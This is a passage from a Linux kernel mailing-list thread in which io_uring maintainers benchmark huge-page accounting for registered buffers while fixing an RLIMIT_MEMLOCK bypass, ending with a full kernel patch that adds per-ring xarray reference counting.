>>>>> nthreads 32:    4160 msec
>>>>>
>>>>> This includes both registering buffers, cloning all of them to another
>>>>> ring, and unregistering times, and nowhere is locking scalability an
>>>>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>>>>> no, I strongly believe this isn't an issue.
>>>>>
>>>>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>>>>> them are super cheap. Does it matter? I really don't think so, or people
>>>>> would've complained already. The only complaint I got on these kinds of
>>>>> things was for cloning, which did get fixed up some releases ago.
>>>>
>>>> You need compound pages
>>>>
>>>> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
>>>>
>>>> And use update() instead of register() as accounting dedup for
>>>> registration is broken-disabled. For the current kernel:
>>>>
>>>> Single threaded:
>>>> 1x1G: 7.5s
>>>> 2x1G: 45s
>>>> 4x1G: 190s
>>>>
>>>> 16x should be ~3000s, not going to run it. Uninterruptible and no
>>>> cond_resched, so spawn NR_CPUS threads and the system is completely
>>>> unresponsive (I guess it depends on the preemption mode).
>>> The program is below for reference, but it's trivial. THP setting
>>> is done inside for convenience. There are ways to make the runtime
>>> even worse, but that should be enough.
>>
>> Thanks for sending that. Ran it on the same box, on current -git and
>> with user_struct xarray accounting. Modified it so that 2nd arg is
>> number of threads, for easy running:
> 
> Should've tried 32x32 as well, that ends up going deep into "this sucks"
> territory:
> 
> git
> 
> good luck
> 
> git + user_struct
> 
> axboe@r7625 ~> time ./ppage 32 32
> register 32 GB, num threads 32
> 
> ________________________________________________________
> Executed in   16.34 secs    fish           external
>    usr time    0.54 secs  497.00 micros    0.54 secs
>    sys time  451.94 secs   55.00 micros  451.94 secs

OK, if we use a per-ctx btree, otherwise the code is the same:

axboe@r7625 ~> for i in 1 2 4 8 16; time ./ppage $i $i; end
register 1 GB, num threads 1

________________________________________________________
Executed in   54.06 millis    fish           external
   usr time   41.70 millis  382.00 micros   41.32 millis
   sys time   10.64 millis  314.00 micros   10.33 millis

register 2 GB, num threads 2

________________________________________________________
Executed in  105.56 millis    fish           external
   usr time   60.65 millis  485.00 micros   60.16 millis
   sys time   40.11 millis    0.00 micros   40.11 millis

register 4 GB, num threads 4

________________________________________________________
Executed in  209.98 millis    fish           external
   usr time   38.57 millis  447.00 micros   38.12 millis
   sys time  190.61 millis    0.00 micros  190.61 millis

register 8 GB, num threads 8

________________________________________________________
Executed in  423.37 millis    fish           external
   usr time  130.50 millis  470.00 micros  130.03 millis
   sys time  380.80 millis    0.00 micros  380.80 millis

register 16 GB, num threads 16

________________________________________________________
Executed in  832.71 millis    fish           external
   usr time    0.27 secs    470.00 micros    0.27 secs
   sys time    1.04 secs      0.00 micros    1.04 secs

and the crazier cases:

axboe@r7625 ~> time ./ppage 32 32
register 32 GB, num threads 32

________________________________________________________
Executed in    2.81 secs    fish           external
   usr time    0.71 secs  497.00 micros    0.71 secs
   sys time   19.57 secs  183.00 micros   19.57 secs

which isn't insane. Obviously also needs conditional rescheduling in the
page loops, as those can take a loooong time for large amounts of
memory.

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 16:52                             ` Jens Axboe
@ 2026-01-24 11:04                               ` Pavel Begunkov
  2026-01-24 15:14                                 ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-24 11:04 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 16:52, Jens Axboe wrote:
> On 1/23/26 8:04 AM, Jens Axboe wrote:
>> On 1/23/26 7:50 AM, Jens Axboe wrote:
>>> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>>>> On 1/22/26 21:51, Pavel Begunkov wrote:
>>>> ...
>>>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>>>> any practical concern.
>>>>>>>
>>>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>>>> system.
...
>> Should've tried 32x32 as well, that ends up going deep into "this sucks"
>> territory:
>>
>> git
>>
>> good luck

FWIW, current scales perfectly with CPUs, so just 1 thread
should be enough for testing.

>> git + user_struct
>>
>> axboe@r7625 ~> time ./ppage 32 32
>> register 32 GB, num threads 32
>>
>> ________________________________________________________
>> Executed in   16.34 secs    fish           external

That's as precise to the calculations above as it could be, it
was 100x16GB but that should only be differ by the factor of ~1.5.
Without anchoring to this particular number, the problem is that
the wall clock runtime for the accounting will linearly depend on
the number of threads, so this 16 sec is what seemed concerning.

>>     usr time    0.54 secs  497.00 micros    0.54 secs
>>     sys time  451.94 secs   55.00 micros  451.94 secs
> 
...
> and the crazier cases:

I don't think it's even crazy, thinking of databases with lots
of caches where it wants to read to / write from. 100GB+
shouldn't be surprising.

> axboe@r7625 ~> time ./ppage 32 32
> register 32 GB, num threads 32
> 
> ________________________________________________________
> Executed in    2.81 secs    fish           external
>     usr time    0.71 secs  497.00 micros    0.71 secs
>     sys time   19.57 secs  183.00 micros   19.57 secs
> 
> which isn't insane. Obviously also needs conditional rescheduling in the
> page loops, as those can take a loooong time for large amounts of
> memory.

2.8 sec sounds like a lot as well, makes me wonder which part of
that is mm, but it mm should scale fine-ish. Surely there will be
contention on page refcounts but at least the table walk is
lockless in the best case scenario and otherwise seems to be read
protected by an rw lock.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 11:04                               ` Pavel Begunkov
@ 2026-01-24 15:14                                 ` Jens Axboe
  2026-01-24 15:55                                   ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-24 15:14 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 4:04 AM, Pavel Begunkov wrote:
> On 1/23/26 16:52, Jens Axboe wrote:
>> On 1/23/26 8:04 AM, Jens Axboe wrote:
>>> On 1/23/26 7:50 AM, Jens Axboe wrote:
>>>> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>>>>> On 1/22/26 21:51, Pavel Begunkov wrote:
>>>>> ...
>>>>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>>>>> any practical concern.
>>>>>>>>
>>>>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>>>>> system.
> ...
>>> Should've tried 32x32 as well, that ends up going deep into "this sucks"
>>> territory:
>>>
>>> git
>>>
>>> good luck
> 
> FWIW, current scales perfectly with CPUs, so just 1 thread
> should be enough for testing.
> 
>>> git + user_struct
>>>
>>> axboe@r7625 ~> time ./ppage 32 32
>>> register 32 GB, num threads 32
>>>
>>> ________________________________________________________
>>> Executed in   16.34 secs    fish           external
> 
> That's as precise to the calculations above as it could be, it
> was 100x16GB but that should only be differ by the factor of ~1.5.
> Without anchoring to this particular number, the problem is that
> the wall clock runtime for the accounting will linearly depend on
> the number of threads, so this 16 sec is what seemed concerning.
> 
>>>     usr time    0.54 secs  497.00 micros    0.54 secs
>>>     sys time  451.94 secs   55.00 micros  451.94 secs
>>
> ...
>> and the crazier cases:
> 
> I don't think it's even crazy, thinking of databases with lots
> of caches where it wants to read to / write from. 100GB+
> shouldn't be surprising.

I mean crazier in terms of runtime, not use case. 32G is peanuts in
terms of memory these days.

>> axboe@r7625 ~> time ./ppage 32 32
>> register 32 GB, num threads 32
>>
>> ________________________________________________________
>> Executed in    2.81 secs    fish           external
>>     usr time    0.71 secs  497.00 micros    0.71 secs
>>     sys time   19.57 secs  183.00 micros   19.57 secs
>>
>> which isn't insane. Obviously also needs conditional rescheduling in the
>> page loops, as those can take a loooong time for large amounts of
>> memory.
> 
> 2.8 sec sounds like a lot as well, makes me wonder which part of
> that is mm, but it mm should scale fine-ish. Surely there will be
> contention on page refcounts but at least the table walk is
> lockless in the best case scenario and otherwise seems to be read
> protected by an rw lock.

Well a lot of that is also just faulting in the memory on clear, test
case should probably be modified to do its own timing. And iterating
page arrays is a huge part of it too. There's no real contention in that
2.8 seconds.

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 15:14                                 ` Jens Axboe
@ 2026-01-24 15:55                                   ` Jens Axboe
  2026-01-24 16:30                                     ` Pavel Begunkov
  2026-01-24 18:44                                     ` Jens Axboe
  0 siblings, 2 replies; 22+ messages in thread
From: Jens Axboe @ 2026-01-24 15:55 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 8:14 AM, Jens Axboe wrote:
>>> ________________________________________________________
>>> Executed in    2.81 secs    fish           external
>>>     usr time    0.71 secs  497.00 micros    0.71 secs
>>>     sys time   19.57 secs  183.00 micros   19.57 secs
>>>
>>> which isn't insane. Obviously also needs conditional rescheduling in the
>>> page loops, as those can take a loooong time for large amounts of
>>> memory.
>>
>> 2.8 sec sounds like a lot as well, makes me wonder which part of
>> that is mm, but it mm should scale fine-ish. Surely there will be
>> contention on page refcounts but at least the table walk is
>> lockless in the best case scenario and otherwise seems to be read
>> protected by an rw lock.
> 
> Well a lot of that is also just faulting in the memory on clear, test
> case should probably be modified to do its own timing. And iterating
> page arrays is a huge part of it too. There's no real contention in that
> 2.8 seconds.

I checked and the faulting part is 2.0s of that runtime. On a re-run:

axboe@r7625 ~> time ./ppage 32 32
register 32 GB, num threads 32
clear msec 2011

________________________________________________________
Executed in    3.13 secs    fish           external
   usr time    0.78 secs  193.00 micros    0.78 secs
   sys time   27.46 secs  271.00 micros   27.46 secs

Or just a single thread:

axboe@r7625 ~> time ./ppage 32 1
register 32 GB, num threads 1
clear msec 2081

________________________________________________________
Executed in    2.29 secs    fish           external
   usr time    0.58 secs  750.00 micros    0.58 secs
   sys time    1.71 secs    0.00 micros    1.71 secs

axboe@r7625 ~ [1]> time ./ppage 64 1
register 64 GB, num threads 1
clear msec 5380

________________________________________________________
Executed in    6.24 secs    fish           external
   usr time    1.42 secs  328.00 micros    1.42 secs
   sys time    4.82 secs  375.00 micros    4.82 secs

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 15:55                                   ` Jens Axboe
@ 2026-01-24 16:30                                     ` Pavel Begunkov
  2026-01-24 18:44                                     ` Jens Axboe
  1 sibling, 0 replies; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-24 16:30 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 15:55, Jens Axboe wrote:
> On 1/24/26 8:14 AM, Jens Axboe wrote:
>>>> ________________________________________________________
>>>> Executed in    2.81 secs    fish           external
>>>>      usr time    0.71 secs  497.00 micros    0.71 secs
>>>>      sys time   19.57 secs  183.00 micros   19.57 secs
>>>>
>>>> which isn't insane. Obviously also needs conditional rescheduling in the
>>>> page loops, as those can take a loooong time for large amounts of
>>>> memory.
>>>
>>> 2.8 sec sounds like a lot as well, makes me wonder which part of
>>> that is mm, but it mm should scale fine-ish. Surely there will be
>>> contention on page refcounts but at least the table walk is
>>> lockless in the best case scenario and otherwise seems to be read
>>> protected by an rw lock.
>>
>> Well a lot of that is also just faulting in the memory on clear, test
>> case should probably be modified to do its own timing. And iterating
>> page arrays is a huge part of it too. There's no real contention in that
>> 2.8 seconds.
> 
> I checked and the faulting part is 2.0s of that runtime. On a re-run:

Makes sense, I was forgetting it's full time.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 15:55                                   ` Jens Axboe
  2026-01-24 16:30                                     ` Pavel Begunkov
@ 2026-01-24 18:44                                     ` Jens Axboe
  1 sibling, 0 replies; 22+ messages in thread
From: Jens Axboe @ 2026-01-24 18:44 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 8:55 AM, Jens Axboe wrote:
> On 1/24/26 8:14 AM, Jens Axboe wrote:
>>>> ________________________________________________________
>>>> Executed in    2.81 secs    fish           external
>>>>     usr time    0.71 secs  497.00 micros    0.71 secs
>>>>     sys time   19.57 secs  183.00 micros   19.57 secs
>>>>
>>>> which isn't insane. Obviously also needs conditional rescheduling in the
>>>> page loops, as those can take a loooong time for large amounts of
>>>> memory.
>>>
>>> 2.8 sec sounds like a lot as well, makes me wonder which part of
>>> that is mm, but it mm should scale fine-ish. Surely there will be
>>> contention on page refcounts but at least the table walk is
>>> lockless in the best case scenario and otherwise seems to be read
>>> protected by an rw lock.
>>
>> Well a lot of that is also just faulting in the memory on clear, test
>> case should probably be modified to do its own timing. And iterating
>> page arrays is a huge part of it too. There's no real contention in that
>> 2.8 seconds.
> 
> I checked and the faulting part is 2.0s of that runtime. On a re-run:
> 
> axboe@r7625 ~> time ./ppage 32 32
> register 32 GB, num threads 32
> clear msec 2011
> 
> ________________________________________________________
> Executed in    3.13 secs    fish           external
>    usr time    0.78 secs  193.00 micros    0.78 secs
>    sys time   27.46 secs  271.00 micros   27.46 secs
> 
> Or just a single thread:
> 
> axboe@r7625 ~> time ./ppage 32 1
> register 32 GB, num threads 1
> clear msec 2081
> 
> ________________________________________________________
> Executed in    2.29 secs    fish           external
>    usr time    0.58 secs  750.00 micros    0.58 secs
>    sys time    1.71 secs    0.00 micros    1.71 secs
> 
> axboe@r7625 ~ [1]> time ./ppage 64 1
> register 64 GB, num threads 1
> clear msec 5380
> 
> ________________________________________________________
> Executed in    6.24 secs    fish           external
>    usr time    1.42 secs  328.00 micros    1.42 secs
>    sys time    4.82 secs  375.00 micros    4.82 secs

Pondering this some more... We only need the page as the key, as far as
I can tell. The memory is always accounted to ctx->user anyway, and each
struct page address is the same across mm's anyway. So unless I'm
missing something, which is of course quite possible, a per-ctx
accounting should be just fine. This will account each ring registration
separate obviously, but this is what we're doing now anyway. If we want
per user_struct accounting to only account each unique page once, then
we'd simply need to move the xarray to struct user_struct. At least to
me, the important part here is that we need the keep the page pinned
until all refs to it have dropped.

Running with multiple threads in this test case is also pretty futile,
as most of them will run into contention off:

io_register_rsrc_update
    __io_register_rsrc_update
        io_sqe_buffer_register
           io_pin_pages
               gup_fast_fallback
                   __gup_longterm_locked
                       __get_user_pages
                           handle_mm_fault
                           follow_page_pte

which is where basically all of the time is spent on the thread side,
there are multiple threads doing this at the same time. This is really
why cloning exists, just register them once in the parent and clone
between threads.

With all that set, here's the test patch I've run just now:

From 9d7186140889a5db525b425f82e4da642070e82d Mon Sep 17 00:00:00 2001
From: Jens Axboe <axboe@kernel.dk>
Date: Sat, 24 Jan 2026 10:02:41 -0700
Subject: [PATCH] io_uring/rsrc: add huge page accounting for registered
 buffers

Track huge page references in a per-ring xarray to prevent double
accounting when the same huge page is used by multiple registered
buffers, either within the same ring or across cloned rings.

When registering buffers backed by huge pages, we need to account for
RLIMIT_MEMLOCK. But if multiple buffers share the same huge page (common
with cloned buffers), we must not account for the same page multiple
times. Similarly, we must only unaccount when the last reference to a
huge page is released.

Maintain a per-ring xarray (hpage_acct) that tracks reference counts for
each huge page. When registering a buffer, for each unique huge page,
increment it's accounting reference count, and only account pages that
are newly added.

When unregistering a buffer, for each unique huge page, decrement its
refcount. Once the refcount hits zero, the page is unaccounted.

Note: any account is done against the ctx->user that was assigned when
the ring was setup. As before, if root is running the operation, no
accounting is done.

With these changes, any use of imu->acct_pages is also dead, hence kill
it from struct io_mapped_ubuf. This shrinks it from 54b to 48b on a
64-bit arch.

Signed-off-by: Jens Axboe <axboe@kernel.dk>
---
 include/linux/io_uring_types.h |   3 +
 io_uring/io_uring.c            |   3 +
 io_uring/rsrc.c                | 218 ++++++++++++++++++++++++---------
 io_uring/rsrc.h                |   1 -
 4 files changed, 164 insertions(+), 61 deletions(-)

diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index dc6bd6940a0d..69b9aaf5b3d2 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -418,6 +418,9 @@ struct io_ring_ctx {
 	/* Stores zcrx object pointers of type struct io_zcrx_ifq */
 	struct xarray			zcrx_ctxs;
 
+	/* Used for accounting references on pages in registered buffers */
+	struct xarray		hpage_acct;
+
 	u32			pers_next;
 	struct xarray		personalities;
 
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index 5c503a3f6ecc..dde5d7709c4f 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -230,6 +230,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 		return NULL;
 
 	xa_init(&ctx->io_bl_xa);
+	xa_init(&ctx->hpage_acct);
 
 	/*
 	 * Use 5 bits less than the max cq entries, that should give us around
@@ -298,6 +299,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 	io_free_alloc_caches(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 	return NULL;
 }
@@ -2178,6 +2180,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
 	io_napi_free(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 }
 
diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 41c89f5c616d..cf22de299464 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -28,7 +28,45 @@ struct io_rsrc_update {
 };
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-			struct iovec *iov, struct page **last_hpage);
+						   struct iovec *iov);
+
+static bool hpage_acct_ref(struct io_ring_ctx *ctx, struct page *hpage)
+{
+	unsigned long key = (unsigned long) hpage;
+	unsigned long count;
+	void *entry;
+
+	lockdep_assert_held(&ctx->uring_lock);
+
+	entry = xa_load(&ctx->hpage_acct, key);
+	if (!entry && xa_reserve(&ctx->hpage_acct, key, GFP_KERNEL_ACCOUNT))
+		return false;
+
+	count = 1;
+	if (entry)
+		count = xa_to_value(entry) + 1;
+	xa_store(&ctx->hpage_acct, key, xa_mk_value(count), GFP_NOWAIT);
+	return count == 1;
+}
+
+static bool hpage_acct_unref(struct io_ring_ctx *ctx, struct page *hpage)
+{
+	unsigned long key = (unsigned long) hpage;
+	unsigned long count;
+	void *entry;
+
+	lockdep_assert_held(&ctx->uring_lock);
+
+	entry = xa_load(&ctx->hpage_acct, key);
+	if (WARN_ON_ONCE(!entry))
+		return false;
+	count = xa_to_value(entry);
+	if (count == 1)
+		xa_erase(&ctx->hpage_acct, key);
+	else
+		xa_store(&ctx->hpage_acct, key, xa_mk_value(count - 1), GFP_NOWAIT);
+	return count == 1;
+}
 
 /* only define max */
 #define IORING_MAX_FIXED_FILES	(1U << 20)
@@ -139,15 +177,53 @@ static void io_free_imu(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 		kvfree(imu);
 }
 
+static unsigned long io_buffer_unaccount_pages(struct io_ring_ctx *ctx,
+					       struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	unsigned long acct = 0;
+	int i;
+
+	if (imu->is_kbuf || !ctx->user)
+		return 0;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+
+		if (!PageCompound(page)) {
+			acct++;
+			continue;
+		}
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		/* Unaccount on last reference */
+		if (hpage_acct_unref(ctx, hpage))
+			acct += page_size(hpage) >> PAGE_SHIFT;
+		cond_resched();
+	}
+
+	return acct;
+}
+
 static void io_buffer_unmap(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 {
+	unsigned long acct_pages = 0;
+
+	/* Always decrement, so it works for cloned buffers too */
+	acct_pages = io_buffer_unaccount_pages(ctx, imu);
+
 	if (unlikely(refcount_read(&imu->refs) > 1)) {
 		if (!refcount_dec_and_test(&imu->refs))
 			return;
 	}
 
-	if (imu->acct_pages)
-		io_unaccount_mem(ctx->user, ctx->mm_account, imu->acct_pages);
+	if (acct_pages)
+		io_unaccount_mem(ctx->user, ctx->mm_account, acct_pages);
 	imu->release(imu->priv);
 	io_free_imu(ctx, imu);
 }
@@ -294,7 +370,6 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 {
 	u64 __user *tags = u64_to_user_ptr(up->tags);
 	struct iovec fast_iov, *iov;
-	struct page *last_hpage = NULL;
 	struct iovec __user *uvec;
 	u64 user_data = up->data;
 	__u32 done;
@@ -322,7 +397,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 		err = io_buffer_validate(iov);
 		if (err)
 			break;
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			err = PTR_ERR(node);
 			break;
@@ -620,76 +695,73 @@ int io_sqe_buffers_unregister(struct io_ring_ctx *ctx)
 }
 
 /*
- * Not super efficient, but this is just a registration time. And we do cache
- * the last compound head, so generally we'll only do a full search if we don't
- * match that one.
- *
- * We check if the given compound head page has already been accounted, to
- * avoid double accounting it. This allows us to account the full size of the
- * page, not just the constituent pages of a huge page.
+ * Undo hpage_acct_ref() calls made during io_buffer_account_pin() on failure.
+ * This operates on the pages array since imu->bvec isn't populated yet.
  */
-static bool headpage_already_acct(struct io_ring_ctx *ctx, struct page **pages,
-				  int nr_pages, struct page *hpage)
+static void io_buffer_unaccount_hpages(struct io_ring_ctx *ctx,
+				       struct page **pages, int nr_pages)
 {
-	int i, j;
+	struct page *seen = NULL;
+	int i;
+
+	if (!ctx->user)
+		return;
 
-	/* check current page array */
 	for (i = 0; i < nr_pages; i++) {
+		struct page *hpage;
+
 		if (!PageCompound(pages[i]))
 			continue;
-		if (compound_head(pages[i]) == hpage)
-			return true;
-	}
-
-	/* check previously registered pages */
-	for (i = 0; i < ctx->buf_table.nr; i++) {
-		struct io_rsrc_node *node = ctx->buf_table.nodes[i];
-		struct io_mapped_ubuf *imu;
 
-		if (!node)
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
 			continue;
-		imu = node->buf;
-		for (j = 0; j < imu->nr_bvecs; j++) {
-			if (!PageCompound(imu->bvec[j].bv_page))
-				continue;
-			if (compound_head(imu->bvec[j].bv_page) == hpage)
-				return true;
-		}
-	}
+		seen = hpage;
 
-	return false;
+		hpage_acct_unref(ctx, hpage);
+		cond_resched();
+	}
 }
 
 static int io_buffer_account_pin(struct io_ring_ctx *ctx, struct page **pages,
-				 int nr_pages, struct io_mapped_ubuf *imu,
-				 struct page **last_hpage)
+				 int nr_pages)
 {
+	unsigned long acct_pages = 0;
+	struct page *seen = NULL;
 	int i, ret;
 
-	imu->acct_pages = 0;
+	if (!ctx->user)
+		return 0;
+
 	for (i = 0; i < nr_pages; i++) {
+		struct page *hpage;
+
 		if (!PageCompound(pages[i])) {
-			imu->acct_pages++;
-		} else {
-			struct page *hpage;
-
-			hpage = compound_head(pages[i]);
-			if (hpage == *last_hpage)
-				continue;
-			*last_hpage = hpage;
-			if (headpage_already_acct(ctx, pages, i, hpage))
-				continue;
-			imu->acct_pages += page_size(hpage) >> PAGE_SHIFT;
+			acct_pages++;
+			continue;
 		}
+
+		hpage = compound_head(pages[i]);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		if (hpage_acct_ref(ctx, hpage))
+			acct_pages += page_size(hpage) >> PAGE_SHIFT;
+		cond_resched();
 	}
 
-	if (!imu->acct_pages)
-		return 0;
+	/* Try to account the memory */
+	if (acct_pages) {
+		ret = io_account_mem(ctx->user, ctx->mm_account, acct_pages);
+		if (ret) {
+			/* Undo the refs we just added */
+			io_buffer_unaccount_hpages(ctx, pages, nr_pages);
+			return ret;
+		}
+	}
 
-	ret = io_account_mem(ctx->user, ctx->mm_account, imu->acct_pages);
-	if (ret)
-		imu->acct_pages = 0;
-	return ret;
+	return 0;
 }
 
 static bool io_coalesce_buffer(struct page ***pages, int *nr_pages,
@@ -778,8 +850,7 @@ bool io_check_coalesce_buffer(struct page **page_array, int nr_pages,
 }
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-						   struct iovec *iov,
-						   struct page **last_hpage)
+						   struct iovec *iov)
 {
 	struct io_mapped_ubuf *imu = NULL;
 	struct page **pages = NULL;
@@ -817,7 +888,7 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 		goto done;
 
 	imu->nr_bvecs = nr_pages;
-	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
+	ret = io_buffer_account_pin(ctx, pages, nr_pages);
 	if (ret)
 		goto done;
 
@@ -867,7 +938,6 @@ static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
 int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			    unsigned int nr_args, u64 __user *tags)
 {
-	struct page *last_hpage = NULL;
 	struct io_rsrc_data data;
 	struct iovec fast_iov, *iov = &fast_iov;
 	const struct iovec __user *uvec;
@@ -913,7 +983,7 @@ int io_sqe_buffers_register(struct io_ring_ctx *ctx, void __user *arg,
 			}
 		}
 
-		node = io_sqe_buffer_register(ctx, iov, &last_hpage);
+		node = io_sqe_buffer_register(ctx, iov);
 		if (IS_ERR(node)) {
 			ret = PTR_ERR(node);
 			break;
@@ -980,7 +1050,6 @@ int io_buffer_register_bvec(struct io_uring_cmd *cmd, struct request *rq,
 
 	imu->ubuf = 0;
 	imu->len = blk_rq_bytes(rq);
-	imu->acct_pages = 0;
 	imu->folio_shift = PAGE_SHIFT;
 	refcount_set(&imu->refs, 1);
 	imu->release = release;
@@ -1153,6 +1222,33 @@ int io_import_reg_buf(struct io_kiocb *req, struct iov_iter *iter,
 }
 
 /* Lock two rings at once. The rings must be different! */
+static void io_buffer_acct_cloned_hpages(struct io_ring_ctx *ctx,
+					 struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	int i;
+
+	if (imu->is_kbuf || !ctx->user)
+		return;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+
+		if (!PageCompound(page))
+			continue;
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		/* Atomically add reference for cloned buffer */
+		hpage_acct_ref(ctx, hpage);
+		cond_resched();
+	}
+}
+
 static void lock_two_rings(struct io_ring_ctx *ctx1, struct io_ring_ctx *ctx2)
 {
 	if (ctx1 > ctx2)
@@ -1234,6 +1330,8 @@ static int io_clone_buffers(struct io_ring_ctx *ctx, struct io_ring_ctx *src_ctx
 
 			refcount_inc(&src_node->buf->refs);
 			dst_node->buf = src_node->buf;
+			/* track compound references to clones */
+			io_buffer_acct_cloned_hpages(ctx, src_node->buf);
 		}
 		data.nodes[off++] = dst_node;
 		i++;
diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
index 4a5db2ad1af2..753d0cec5175 100644
--- a/io_uring/rsrc.h
+++ b/io_uring/rsrc.h
@@ -34,7 +34,6 @@ struct io_mapped_ubuf {
 	unsigned int	nr_bvecs;
 	unsigned int    folio_shift;
 	refcount_t	refs;
-	unsigned long	acct_pages;
 	void		(*release)(void *);
 	void		*priv;
 	bool		is_kbuf;
-- 
2.51.0

-- 
Jens Axboe

^ permalink raw reply related	[flat|nested] 22+ messages in thread

end of thread, other threads:[~2026-01-24 18:44 UTC | newest]

Thread overview: 22+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-01-19  7:10 [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting Yuhao Jiang
2026-01-19 17:03 ` Jens Axboe
2026-01-19 23:34   ` Yuhao Jiang
2026-01-19 23:40     ` Jens Axboe
2026-01-20  7:05       ` Yuhao Jiang
2026-01-20 12:04         ` Jens Axboe
2026-01-20 12:05         ` Pavel Begunkov
2026-01-20 17:03           ` Jens Axboe
2026-01-20 21:45             ` Pavel Begunkov
2026-01-21 14:58               ` Jens Axboe
2026-01-22 11:43                 ` Pavel Begunkov
2026-01-22 17:47                   ` Jens Axboe
2026-01-22 21:51                     ` Pavel Begunkov
2026-01-23 14:26                       ` Pavel Begunkov
2026-01-23 14:50                         ` Jens Axboe
2026-01-23 15:04                           ` Jens Axboe
2026-01-23 16:52                             ` Jens Axboe
2026-01-24 11:04                               ` Pavel Begunkov
2026-01-24 15:14                                 ` Jens Axboe
